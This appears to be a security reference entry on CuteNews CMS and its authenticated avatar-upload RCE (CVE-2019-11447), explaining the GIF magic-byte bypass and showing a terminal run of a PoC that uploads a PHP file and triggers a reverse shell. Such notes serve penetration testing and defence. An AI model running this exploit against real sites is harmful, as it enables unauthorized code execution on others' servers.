CuteNews

CuteNews is a lightweight, flat-file CMS designed primarily for managing and publishing news articles or blog posts without the need for a database backend. Developed in PHP, it stores content in plain text files, making it easier to deploy on minimal hosting environments. While its simplicity makes it attractive for small websites and personal blogs, its limited security mechanisms have led to multiple vulnerabilities over time.

Authenticated RCE

CuteNews version 2.1.2 is affected by an arbitrary file upload vulnerability (CVE-2019-11447). This flaw lies in the way the application handles avatar uploads in the user profile section. Specifically, the avatar_file parameter passed to index.php?mod=main&opt=personal allows an attacker to upload a malicious file disguised as an image. Due to insufficient validation of the $imgsize variable in /core/modules/dashboard.php, the application fails to properly inspect the uploaded file’s content. This enables an attacker to manipulate the file’s header—for instance, by adding a GIF file signature—to bypass content filters and achieve RCE. A working PoC is available:

$ python3 exploit.py -l http://cn-instance -u test123 -p test123 -e test@mail.com
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
​
[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php
​
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://cn-instance/uploads/avatar_test123_test123.php
​
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell